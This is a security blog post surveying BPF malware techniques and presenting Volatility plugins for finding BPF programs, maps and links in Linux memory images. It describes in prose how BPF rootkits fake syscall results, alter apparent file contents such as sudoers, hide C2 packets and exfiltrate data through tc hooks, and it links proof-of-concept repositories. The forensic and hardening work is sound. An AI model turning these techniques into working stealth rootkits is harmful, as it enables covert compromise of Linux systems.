<p>However, there are of course limits to the portability of BPF programs. As we all know, the kernel takes great care to never break user space, within kernel land, on the other hand, there are no stability guarantees at all. BPF programs are not considered to be part of user space and thus there are no forward or backward compatibility guarantees. In practice, that means that APIs exposed to BPF could be removed or changed, attachment points could vanish or change their signature, or programs that are currently accepted by the static verifier could be rejected in the future. Furthermore, changes in kernel configuration could remove structure fields, functions, or kernel APIs that programs rely on. In that sense, BPF programs are in a position similar to out-of-tree kernel modules. That being said, due to CORE, there is no need to have the headers of the target kernel available at compile time and thus a lot less knowledge about the target is needed to be confident that the program will be able to run successfully. Furthermore, in the worst case the program will be rejected by the kernel, but there are no negative implications on system stability by attempting to load it.</p>

<p>Finally, we should mention that BPF is an entirely privileged interface. There are multiple BPF-related <a href="https://elixir.bootlin.com/linux/v6.1.68/source/include/uapi/linux/capability.h#L411">capabilities</a> that a process can have, which open up various parts of the subsystem. This has not always been the case. A few years ago, unprivileged users were able to load certain types of BPF programs, however, access to the BPF VM comes with two potential security problems. First, the security entirely relies on the correctness of the static verification stage, which is notoriously complex and must keep up with the ever-expanding feature set. It has been demonstrated that errors in the verification process can be exploited for local privilege escalation, e.g., <a href="https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification">CVE-2020-8835</a> or <a href="https://chompie.rip/Blog+Posts/Kernel+Pwning+with+eBPF+-+a+Love+Story">CVE-2021-3490</a>. Second, even within the boundaries set by the verifier, the far-reaching control over the CPU instructions that get executed in kernel mode opens up the door for Spectre attacks, c.f., <a href="https://github.com/hamishcoleman/spectre-tests/blob/master/project-zero/writeup_files/WRITEUP#L282">Jann Horn’s writeup</a> or the original <a href="https://spectreattack.com/spectre.pdf">Spectre paper</a>. For those reasons, the kernel community has decided to remove unprivileged access to BPF <a href="https://elixir.bootlin.com/linux/v6.1.68/source/kernel/bpf/Kconfig#L71">by default</a>.</p>

<h2 id="bpf-malware">BPF Malware</h2>

<p>To better understand the implications the addition of the BPF VM has for the Linux malware landscape, we would like to start with a quote from “BPF inventor” Alexei Starovoitov: “If in the past the whole kernel would maybe be [a] hundred of programmers across the world, now a hundred thousand people around the world can program the kernel thanks to BPF.”, i.e., BPF significantly lowers the entry barrier to kernel programming and shipping applications that include kernel-level code. While the majority of new kernel programmers are well-intentioned and aim to develop innovative and useful applications, experience has shown that there will be some actors who seek to use new kernel features for malicious purposes.</p>

<p>From a malware author’s perspective, one of the first questions is probably how likely it is that a target system will support the loading of malicious BPF programs. According to our personal experience it is safe to say that most general-purpose desktop and server distributions enable BPF. The feature is also enabled in the <code class="language-plaintext highlighter-rouge">android-base.config</code> as BPF plays a significant role in the Android OS, i.e., essentially every Android device should support BPF - from your fridge to your phone. Concerning the custom kernels used by big tech companies let me quote Brendan Gregg, another early BPF advocate: “As companies use more and more eBPF also, it becomes harder for your operating system to not have eBPF because you are no longer eligible to run workloads at Netflix or at Meta or at other companies.”. What is more, Google relies on BPF (through <a href="https://github.com/cilium/cilium"><code class="language-plaintext highlighter-rouge">cilium</code></a>) in its Kubernetes engine and Facebook uses it for its layer 4 load balancer <a href="https://github.com/facebookincubator/katran"><code class="language-plaintext highlighter-rouge">katran</code></a>. For a more comprehensive survey of BPF usage in cloud environments we recommend section 5 of <a href="https://www.usenix.org/conference/usenixsecurity23/presentation/he"><em>Cross Container Attacks: The Bewildered eBPF on Clouds</em></a> by Yi He et al. Thus, most of the machines that constitute “the cloud” are likely to support BPF. This is particularly interesting as signature verification for BPF programs is still not available, making it the only way to run kernel code on locked-down systems that restrict the use of kernel modules.</p>

<p>However, enabling the BPF subsystem, i.e., <code class="language-plaintext highlighter-rouge">CONFIG_BPF</code>, is only the beginning of the story. There are many compile-time or run-time configuration choices that affect the capabilities granted to BPF programs, and thus the ways in which they can be used to subvert the security of a system. Giving a full overview of all the available switches and their effect would exceed the scope of this post, however, we will mention some knobs that can be turned to stop the abuses mentioned below.</p>

<p>If you search for the term “BPF malware” these days, you will find rather sensational articles with titles like “eBPF: A new frontier for malware”, “How BPF-Enabled Malware Works”, “eBPF Offensive Capabilities – Get Ready for Next-gen Malware”, “Nothing is Safe Anymore - Beware of the “eBPF Trojan Horse” or “HOW DOES EBPF MALWARE PERFORM AGAINST STAR LAB’S KEVLAR EMBEDDED SECURITY?”. Needless to say, that they contain hardly any useful information. The truth is that we are not aware of any reports of in-the-wild malware using BPF. Nevertheless, there is no shortage in open source PoC BPF malwares on GitHub. The two biggest ones are probably <a href="https://github.com/Gui774ume/ebpfkit">ebpfkit</a> and <a href="https://github.com/h3xduck/TripleCross">TripeCross</a>, however, there are many smaller projects like <a href="https://github.com/eeriedusk/nysm">nysm</a>, <a href="https://github.com/Esonhugh/sshd_backdoor">sshd_backdoor</a>, <a href="https://github.com/krisnova/boopkit">boopkit</a>, <a href="https://github.com/citronneur/pamspy">pamspy</a>, or <a href="https://github.com/pathtofile/bad-bpf">bad bpf</a> as well as snippet collections like <a href="https://github.com/nccgroup/ebpf">nccgroup’s bpf tools</a>, <a href="https://github.com/wunderwuzzi23/Offensive-BPF">Offensive-BPF</a>. Researchers also used malicious BPF programs to <a href="https://www.usenix.org/conference/usenixsecurity23/presentation/he">escape container isolation</a> in multiple real-world cloud environments.</p>

<p>There are a couple of core shenanigans that those malwares are constructed around, three of which we will briefly describe here.</p>

<p>It is possible to transparently (for user space) skip the execution of any system call or to manipulate just the return value after it was executed. This is since BPF can be used for the purpose of <a href="https://lwn.net/Articles/740146/">error injection</a>. To be precise, any function that is annotated with the <code class="language-plaintext highlighter-rouge">ALLOW_ERROR_INJECTION</code> macro can be manipulated in this way, and every system call is <a href="https://elixir.bootlin.com/linux/v6.1.64/source/arch/x86/include/asm/syscall_wrapper.h#L74">automatically annotated</a> via the macro that defines it. One would hope that the corresponding configurations <a href="https://elixir.bootlin.com/linux/v6.1.64/source/kernel/trace/Kconfig#L711"><code class="language-plaintext highlighter-rouge">BPF_KPROBE_OVERRIDE</code></a> and <a href="https://elixir.bootlin.com/linux/v6.1.67/source/lib/Kconfig.debug#L1880"><code class="language-plaintext highlighter-rouge">CONFIG_FUNCTION_ERROR_INJECTION</code></a> would not be enabled in kernels shipped to end users, but they are. There are many things that one can do by lying to user space in this way, one example would be to block the sending of all signals to a specific process, e.g., to protect it from being <a href="https://github.com/Gui774ume/ebpfkit/blob/5727985eab7eca7255ca5cb7c74133c0074e3324/ebpf/ebpfkit/signal.h#L18">killed</a>. Interestingly, the same helper is also used by BPF-based security solutions like <a href="https://github.com/cilium/tetragon/blob/d8f5d44810ad2079ee408175454aab5c1159f09e/docs/content/en/docs/concepts/tracing-policy/selectors.md?plain=1#L1030">tetragon</a>, which are deployed in production cloud environments.</p>

<p>Another common primitive is to write to memory of the current process, which gives attackers the power to perform all sorts of interesting memory corruptions. One of the more original ideas is to <a href="https://github.com/nccgroup/ebpf/tree/master/glibcpwn">inject code</a> into a process by writing a ROP chain onto its stack. The chain sets up everything to load a shared library and cleanly resumes the process afterwards. More generally, the helper <code class="language-plaintext highlighter-rouge">bpf_probe_write_user</code> is involved in many techniques to hide objects, e.g., sockets or BPF programs, from user space or when manipulating apparent file and directory contents, e.g., <code class="language-plaintext highlighter-rouge">/proc</code>, <code class="language-plaintext highlighter-rouge">/etc/sudoers</code> or <code class="language-plaintext highlighter-rouge">~/.ssh/authorized_keys</code>. In particular, those apparent modifications cannot be caught with file system forensics as they are only happening in the memory of the process that attempts to access the resource, e.g., see <a href="https://github.com/pathtofile/bad-bpf/blob/main/src/textreplace.bpf.c"><code class="language-plaintext highlighter-rouge">textreplace</code></a> for an example that allows arbitrary apparent modifications of file contents. While there are in fact a couple of legitimate programs (like the <a href="https://github.com/DataDog/datadog-agent/blob/f425dfa882dd9ca8533172c246ea047be1a40799/pkg/security/ebpf/probes/all.go#L257">Datadog-agent</a>) using this function, it is probably wise to enable <a href="https://elixir.bootlin.com/linux/v6.1.67/source/security/lockdown/Kconfig#L33"><code class="language-plaintext highlighter-rouge">CONFIG_LOCK_DOWN_KERNEL_FORCE_INTEGRITY</code></a> before compilation.</p>

<p>A rather peculiar aspect of BPF malware is how it communicates over the network. BPF programs are not able to initiate network connections by themselves, but as one of the main applications of BPF is in the networking subsystem, they have far-reaching capabilities when it comes to managing existing traffic. For example, XDP programs get their hands on packets very early in the receive path, long before mechanisms like netfilter, which is much further up the network stack, get a chance to see them. In fact, there are high-end NICs that support <a href="https://www.netronome.com/blog/ever-deeper-bpf-update-hardware-offload-support/">running BPF programs on the device’s proces</a> rather than the host CPU. Furthermore, programs that handle packets can usually modify, reroute, or drop them. In combination, this is often used to receive C2 commands while at the same time hiding the corresponding packets from the rest of the kernel by modifying or dropping them. In addition, BPF’s easy programmability makes it simple to implement complex, stateful triggers. To exfiltrate data from the system, the contents, and potentially also the recipient data, of outgoing packets are modified, for example by traffic control (tc) hooks. For unreliable transport protocols higher layers will deal with the induced packet loss, while for TCP the retransmission mechanism ensures that applications will not be impacted. Turn off <a href="https://www.kernelconfig.io/CONFIG_NET_CLS_BPF?q=NET_CLS_BPF&amp;kernelversion=6.6.6&amp;arch=x86"><code class="language-plaintext highlighter-rouge">CONFIG_NET_CLS_BPF</code></a> and <a href="https://www.kernelconfig.io/CONFIG_NET_ACT_BPF?q=CONFIG_NET_ACT_BPF&amp;kernelversion=6.6.6&amp;arch=x86"><code class="language-plaintext highlighter-rouge">CONFIG_NET_ACT_BPF</code></a> to disable tc BPF programs.</p>

<p>While the currently charted BPF malware landscape is limited to hobby projects by security researchers and other interested individuals, it would unfortunately not be unheard of that the same projects are eventually discovered during real-world incidents. Advanced Linux malwares, on the other hand, will most likely choose to implement their own BPF programs when they believe that it is beneficial for their cause, for instance to avoid detection by using a mechanism that is not yet well known to the forensic community. Some excerpts from the recent <a href="https://www.youtube.com/watch?v=0BDB53PqcoU">talk by Kris Nova at DevOpsDays Kyiv</a> give an interesting insight into the concerns that the Ukrainian computer security community had, and still has, regarding the use of BPF in Russian attacks on their systems.</p>

<p>It would be dishonest to claim that there is a general schema that you can follow while analyzing an incident to discover all malicious BPF programs. As so often, the boundaries between monitoring software, live patches, security solutions and malware are not clearly defined, e.g., in addition to <code class="language-plaintext highlighter-rouge">bpf_override_retun</code> <a href="https://github.com/cilium/tetragon">tetragon</a> also uses <code class="language-plaintext highlighter-rouge">bpf_send_singal</code>. The first step could be to obtain a baseline of expected BPF-related activity, and carefully analyze any deviations or anomalies. Additionally, a look at the kernel configuration can help to decide which kinds of malicious activity are fundamentally possible. Furthermore, programs that make use of possibly malicious helper functions, like <code class="language-plaintext highlighter-rouge">bpf_probe_wite_user</code>, <code class="language-plaintext highlighter-rouge">bpf_send_signal</code>, <code class="language-plaintext highlighter-rouge">bpf_override_return</code>, or <code class="language-plaintext highlighter-rouge">bpf_skb_store_bytes</code> should be <a href="https://blogs.blackberry.com/en/2021/12/reverse-engineering-ebpfkit-rootkit-with-blackberrys-free-ida-processor-tool">reverse engineered</a> with particular scrutiny. In addition, there are some clear indicators of malicious activity, like the hiding of programs, which we will discuss in more detail below. Finally, once program signatures are upstreamed, it is highly recommended to enable and enforce them to lock down this attack surface.</p>

<p>From now on, we will shift gears and focus on the main topic of this post, hunting BPF malware in main memory images.</p>

<p><em>Aside: The <a href="https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/">bvp47</a>, <a href="https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat">Symbiote</a> and <a href="https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/">BPFdoor</a> rootkits are often said to be examples of BPF malware. However, they are using only what is now known as classic BPF, i.e., the old-school packet filtering programs used by programs like tcpdump.</em></p>

<h2 id="volatility-plugins">Volatility Plugins</h2>

<p>Volatility is a <strong>memory forensics framework</strong> that can be used to analyze physical memory images. It uses information about symbols and types of the operating system that was running on the imaged system to recover high-level information, like the list of running processes or open files, from the raw memory image.</p>

<p>Individual analyses are implemented as <strong>plugins</strong> that make use of the framework library as well as other plugins. Some of those plugins are closely modeled after core unix utilities, like the <code class="language-plaintext highlighter-rouge">ps</code> utility for listing processes, the <code class="language-plaintext highlighter-rouge">ss</code> utility for listing network connections or the <code class="language-plaintext highlighter-rouge">lsmod</code> utility for listing kernel modules. Other plugins implement checks that search for common traces of kernel rootkit activity, like the replacement of function pointers or inline hooks.</p>

<p>There may be multiple ways to obtain the same piece of information, and thus multiple plugins that, on first sight, serve the same purpose. <strong>Inconsistencies</strong> between the methods, however, could indicate malicious activity that tries to hide its presence or just be artifacts of imperfections in the acquisition process. In any case, inconsistencies are something an investigator should look into.</p>

<p>In this section we present seven Volatility plugins that we have developed to enable analysis of the BPF subsystem. Three of these are modelled after subcommands of the <a href="https://github.com/libbpf/bpftool"><code class="language-plaintext highlighter-rouge">bpftool</code></a> utility and provide basic functionality. We then present three plugins that retrieve similar information from other sources and can thus be used to detect inconsistencies. Finally, we present a plugin that aggregates information from four other plugins to make it easier to interpret.</p>

<p>_Note: We published the source code for all of our plugins on <a href="https://github.com/vobst/BPFVol3">GitHub</a>. We would love to see your contributions there! :)</p>

<h3 id="listing-programs-maps--links">Listing Programs, Maps &amp; Links</h3>

<p>Arguably the most basic task that you could think of is simply listing the programs that have been loaded into the BPF VM. We will start by doing this on a live system, feel free to follow along in order to discover what your distribution or additional packages that you installed have already loaded.</p>

<h4 id="live-system">Live System</h4>

<p>The <code class="language-plaintext highlighter-rouge">bpftool</code> user-space utility allows admins to interact with the BPF subsystem. One of the most basic tasks it supports is the listing of all loaded BPF programs, maps, BTF sections, or links. We are sometimes going to refer to these things collectively as <strong>BPF objects</strong>. Roughly speaking, links are a mechanism to connect a loaded program to a point where it is being invoked, and BTF is a condensed form of DWARF debug information.</p>

<p>Lets start with an example to get familiar with the information that is displayed (run <code class="language-plaintext highlighter-rouge">btftool</code> as <code class="language-plaintext highlighter-rouge">root</code>):</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool prog list
<span class="go">[...]
22: lsm  name restrict_filesystems  tag 713a545fe0530ce7  gpl
	loaded_at 2023-11-26T10:31:42+0100  uid 0
	xlated 560B  jited 305B  memlock 4096B  map_ids 13
	btf_id 53
[...]
</span></code></pre></div></div>
<p>From left-to-right and top-to-bottom we have: ID used as an identifier for user-space, program type, program name, tag that is a SHA1 hash over the bytecode, license, program load timestamp, uid of process that loaded it, size of the bytecode, size of the jited code, memory blocked by the program, ids of the maps that the program is using, ids to the BTF information for the program.</p>

<p>We can also inspect the bytecode</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool prog dump xlated <span class="nb">id </span>22
<span class="go">int restrict_filesystems(unsigned long long * ctx):
</span><span class="gp">;</span><span class="w"> </span>int BPF_PROG<span class="o">(</span>restrict_filesystems, struct file <span class="k">*</span>file, int ret<span class="o">)</span>
<span class="go">   0: (79) r3 = *(u64 *)(r1 +0)
   1: (79) r0 = *(u64 *)(r1 +8)
   2: (b7) r1 = 0
[...]
</span></code></pre></div></div>
<p>where each line is the pseudocode of a BPF assembly instruction and we even have line info, which is also stored in the attached BTF information. We can also dump the jited version and confirm that is is essentially a one-to-one translation to x86_64 machine code (depending on the architecture your kernel runs on):</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool prog dump jited <span class="nb">id </span>22
<span class="go">int restrict_filesystems(unsigned long long * ctx):
bpf_prog_713a545fe0530ce7_restrict_filesystems:
</span><span class="gp">;</span><span class="w"> </span>int BPF_PROG<span class="o">(</span>restrict_filesystems, struct file <span class="k">*</span>file, int ret<span class="o">)</span>
<span class="go">   0:	endbr64
   4:	nopl	(%rax,%rax)
   9:	nop
   b:	pushq	%rbp
   c:	movq	%rsp, %rbp
   f:	endbr64
</span><span class="gp">  13:	subq	$</span>24, %rsp
<span class="go">  1a:	pushq	%rbx
  1b:	pushq	%r13
  1d:	movq	(%rdi), %rdx
  21:	movq	8(%rdi), %rax
  25:	xorl	%edi, %edi
[...]
</span></code></pre></div></div>
<p>Furthermore, we can display basic information about the maps used by the program</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool map list <span class="nb">id </span>13
<span class="go">13: hash_of_maps  name cgroup_hash  flags 0x0
	key 8B  value 4B  max_entries 2048  memlock 165920B
</span></code></pre></div></div>
<p>as well as their contents (which are quite boring in this case).</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool map dump <span class="nb">id </span>13
<span class="go">Found 0 elements
</span></code></pre></div></div>
<p>We can also get information about the variables and types (BTF) defined in the program. This is somewhat comparable to the DWARF debug information that comes with some binaries - just that it is harder to strip since its needed by the BPF VM.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool btf dump <span class="nb">id </span>53
<span class="go">[1] PTR '(anon)' type_id=3
[2] INT 'int' size=4 bits_offset=0 nr_bits=32 encoding=SIGNED
[3] ARRAY '(anon)' type_id=2 index_type_id=4 nr_elems=13
[4] INT '__ARRAY_SIZE_TYPE__' size=4 bits_offset=0 nr_bits=32 encoding=(none)
[5] PTR '(anon)' type_id=6
[6] TYPEDEF 'uint64_t' type_id=7
[7] TYPEDEF '__uint64_t' type_id=8
[8] INT 'unsigned long' size=8 bits_offset=0 nr_bits=64 encoding=(none)
[9] PTR '(anon)' type_id=10
[10] TYPEDEF 'uint32_t' type_id=11
[11] TYPEDEF '__uint32_t' type_id=12
[12] INT 'unsigned int' size=4 bits_offset=0 nr_bits=32 encoding=(none)
[13] STRUCT '(anon)' size=24 vlen=3
	'type' type_id=1 bits_offset=0
	'key' type_id=5 bits_offset=64
	'value' type_id=9 bits_offset=128
[...]
</span></code></pre></div></div>
<p>As we said earlier, links are what connects a loaded program to a point that invokes it.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool <span class="nb">link </span>list
<span class="go">[...]
3: tracing  prog 22
	prog_type lsm  attach_type lsm_mac
	target_obj_id 1  target_btf_id 82856
</span></code></pre></div></div>
<p>Again, from left-to-right and top-to-bottom we have: ID, type, attached program’s ID, program’s load type, type that program was attached with, ID of the BTF object that the following field refers to, ID of the type that the program is attached to (functions can also have BTF entries). Note that everything but the first line depends on the type of link that is examined. To find the point where the program is called by the kernel we can inspect the relevant BTF object (the kernel’s in this case).</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>bpftool btf dump <span class="nb">id </span>1 | rg 82856
<span class="go">[82856] FUNC 'bpf_lsm_file_open' type_id=16712 linkage=static
</span></code></pre></div></div>
<p>Thus we can conclude that the program is invoked early in the <code class="language-plaintext highlighter-rouge">do_dentry_open</code> function via the <code class="language-plaintext highlighter-rouge">security_file_open</code> LSM hook and that its return value decides whether the process will be allowed to open the file (we’re skipping some steps here, see our <a href="https://blog.eb9f.de/2023/04/24/lsm2bpf.html">earlier article</a> for the full story).</p>

<p>We performed this little “live investigation” on a laptop running Arch Linux with kernel 6.6.2-arch1-1 and the program wasn’t malware but rather loaded by systemd on boot. You can find the commit that introduced the feature <a href="https://github.com/systemd/systemd/commit/021d1e96123289182565f0b3ce5a705b0e84fe48">here</a>. Again, you can see that in the future there will be more legitimate BPF programs running on your systems (servers, desktops and mobiles) than you might think!</p>

<h4 id="memory-image">Memory Image</h4>

<p>As a first step towards BPF memory forensics it would be nice to be able to perform the above investigation on a memory image. We will now introduce three plugins that aim to make this possible.</p>

<p>We already saw that all sorts of BPF objects are identified by an ID. Internally, these IDs are allocated using the <a href="https://www.kernel.org/doc/html/latest/core-api/idr.html?highlight=idr">IDR mechanism</a>, a core kernel API. For that purpose, three variables are defined at the top of <code class="language-plaintext highlighter-rouge">/kernel/bpf/syscall.c</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[...]</span>
<span class="k">static</span> <span class="nf">DEFINE_IDR</span><span class="p">(</span><span class="n">prog_idr</span><span class="p">);</span>
<span class="k">static</span> <span class="nf">DEFINE_SPINLOCK</span><span class="p">(</span><span class="n">prog_idr_lock</span><span class="p">);</span>
<span class="k">static</span> <span class="nf">DEFINE_IDR</span><span class="p">(</span><span class="n">map_idr</span><span class="p">);</span>
<span class="k">static</span> <span class="nf">DEFINE_SPINLOCK</span><span class="p">(</span><span class="n">map_idr_lock</span><span class="p">);</span>
<span class="k">static</span> <span class="nf">DEFINE_IDR</span><span class="p">(</span><span class="n">link_idr</span><span class="p">);</span>
<span class="k">static</span> <span class="nf">DEFINE_SPINLOCK</span><span class="p">(</span><span class="n">link_idr_lock</span><span class="p">);</span>
<span class="p">[...]</span>
</code></pre></div></div>
<p>Under the hood, the ID allocation mechanism uses an <a href="https://www.kernel.org/doc/html/latest/core-api/xarray.html?highlight=xarray">extensible array (xarray)</a>, a tree-like data structure that is rooted in the <code class="language-plaintext highlighter-rouge">idr_rt</code> member of the structure that is defined by the macro. The ID of a new object is simply an unused index into the array, and the value stored at this index is a pointer to a structure that describes it. Thus, we can re-create the listing capabilities of <code class="language-plaintext highlighter-rouge">bpftool</code> by simply iterating the array. You can find the code that does so in the <a href="https://github.com/vobst/BPFVol3/blob/main/src/utility/datastructures.py#L17">XArray</a> class.</p>

<p>Dereferencing the array entries leads us to structures that hold most of the information displayed by <code class="language-plaintext highlighter-rouge">bpftool</code> earlier.</p>

<p>Entries of the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L50"><code class="language-plaintext highlighter-rouge">prog_idr</code></a> point to objects of type <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/linux/bpf.h#L1217"><code class="language-plaintext highlighter-rouge">bpf_prog</code></a>, the <code class="language-plaintext highlighter-rouge">aux</code> member of this type points to a <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/linux/bpf.h#L1129">structure</a> that hols additional information about the program. We can see how the information <code class="language-plaintext highlighter-rouge">bpftool</code> displays is generated from these structures in the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L3896"><code class="language-plaintext highlighter-rouge">bpf_prog_get_info_by_fd</code></a> function by filling a <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/uapi/linux/bpf.h#L6172"><code class="language-plaintext highlighter-rouge">bpf_prog_info</code></a> struct. The plugin <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_listprogs.py"><code class="language-plaintext highlighter-rouge">bpf_listprogs</code></a> re-implements some of the logic of this functions and displays the following pieces of information.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">columns</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="nb">type</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[</span>
    <span class="p">(</span><span class="s">"OFFSET (V)"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"ID"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"TYPE"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"NAME"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"TAG"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"LOADED AT"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"MAP IDs"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"BTF ID"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
    <span class="p">(</span><span class="s">"HELPERS"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
<span class="p">]</span>
</code></pre></div></div>
<p>Some comments are in order:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">OFFSET (V)</code> are the low 6 bytes of the <code class="language-plaintext highlighter-rouge">bpf_prog</code> structure’s virtual address. This is useful as a unique identifier of the structure.</li>
  <li><code class="language-plaintext highlighter-rouge">LOADED AT</code> is the number of nanoseconds since boot when the program was loaded. Converting it to an absolute timestamp requires parsing additional kernel time-keeping structures and is not in scope for this plugin. There exist Volatility patches that add this functionality but they are not upstream yet. Once they are, it should be trivial to convert this field to match the <code class="language-plaintext highlighter-rouge">bpftool</code> output.</li>
  <li><code class="language-plaintext highlighter-rouge">HELPERS</code> is a field that is not reported by <code class="language-plaintext highlighter-rouge">bpftool</code>. It displays a list of all the kernel functions that are called by the BPF program, i.e., BPF helpers and kfuncs, and is helpful to quickly identify programs that use possibly malicious or non-standard helpers.</li>
  <li>The reporting of memory utilization is omitted as we consider it to be less important for forensic investigations, however, it would be easy to add.</li>
</ul>

<p>The second <code class="language-plaintext highlighter-rouge">bpftool</code> functionality the plugin supports is the dumping of programs in bytecode and jited forms. To dump the machine code of the program, we follow the <code class="language-plaintext highlighter-rouge">bpf_func</code> pointer in the <code class="language-plaintext highlighter-rouge">bpf_prog</code> structure, which points to the entrypoint of the jited BPF program. The length of the machine code is stored in the <code class="language-plaintext highlighter-rouge">jited_len</code> field of the same structure. While we support dumping the raw bytes to a file, their analysis is tedious due to missing symbol information. Thus, we also support disassembling the program and annotating all occurring addresses with the corresponding symbol, which makes the programs much easier to analyze.</p>

<p>Dumping the BPF bytecode is straightforward as well. The flexible <code class="language-plaintext highlighter-rouge">insni</code> array member of the <code class="language-plaintext highlighter-rouge">bpf_prog</code> structure holds the bytecode instructions and the <code class="language-plaintext highlighter-rouge">len</code> field holds their number. Here, we also support dumping the raw and disassembled bytecode. However, the additional symbol annotations are not implemented. As the bytecode is not “what actually runs”, we consider this information more susceptible to anti-forensic tampering and thus focused on the machine code, which is what is executed when invoking the program.</p>

<p><em>Note: We use <a href="https://github.com/capstone-engine/capstone">Capstone</a> for disassembling the BPF bytecode. Unfortunately, Capstone’s BPF architecture is outdated and thus bytecode is sometimes not disassembled entirely. As a workaround, you can dump the raw bytes and use another tool to disassemble them.</em></p>

<p>Entries of the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L52"><code class="language-plaintext highlighter-rouge">map_idr</code></a> point to <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/linux/bpf.h#L202"><code class="language-plaintext highlighter-rouge">bpf_map</code></a> objects. The <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/uapi/linux/bpf.h#L6214"><code class="language-plaintext highlighter-rouge">bpf_map_info</code></a> structure parsed by <code class="language-plaintext highlighter-rouge">bpftool</code> is filled in <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L4185"><code class="language-plaintext highlighter-rouge">bpf_map_get_info_by_fd</code></a> and the plugin <a href="https://github.com/vobst/BPFVol3/blob/main/src/plugins/bpf_listmaps.py"><code class="language-plaintext highlighter-rouge">bpf_listmaps</code></a> is simply copying the logic to display the following pieces of information.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">columns</span><span class="p">:</span> <span class="nb">list</span><span class="p">[</span><span class="nb">tuple</span><span class="p">[</span><span class="nb">str</span><span class="p">,</span> <span class="n">Any</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[</span>
        <span class="p">(</span><span class="s">"OFFSET (V)"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
        <span class="p">(</span><span class="s">"ID"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
        <span class="p">(</span><span class="s">"TYPE"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
        <span class="p">(</span><span class="s">"NAME"</span><span class="p">,</span> <span class="nb">str</span><span class="p">),</span>
        <span class="p">(</span><span class="s">"KEY SIZE"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
        <span class="p">(</span><span class="s">"VALUE SIZE"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
        <span class="p">(</span><span class="s">"MAX ENTRIES"</span><span class="p">,</span> <span class="nb">int</span><span class="p">),</span>
<span class="p">]</span>
</code></pre></div></div>
<p>Dumping the contents of maps is hard due to the diversity in map types. Each map type requires its own handling, beginning with manually downcasting the <code class="language-plaintext highlighter-rouge">bpf_map</code> object to the correct container type. One approach to avoid implementing each lookup mechanism separately, would be through emulation of the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/include/linux/bpf.h#L78"><code class="language-plaintext highlighter-rouge">map_get_next_key</code></a> and <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/bpf/syscall.c#L235"><code class="language-plaintext highlighter-rouge">bpf_map_copy_value</code></a> kernel functions, where the former is a function pointer found in the map’s operations structure. However, this is not in scope for the current plugin.</p>

<p>Furthermore, the dumping could be enhanced by utilizing the BTF information that is optionally attached to the map to properly display keys and values, similar to the <a href="https://elixir.bootlin.com/linux/v6.1.63/source/kernel/trace/bpf_trace.c#L1015"><code class="language-plaintext highlighter-rouge">bpf_snprintf_btf</code></a> helper that can be used to pretty-print objects using their BTF information.</p>

<p>We implemented the dumping for the most straightforward map type - arrays - but the plugin does not support dumping other types of maps.</p>

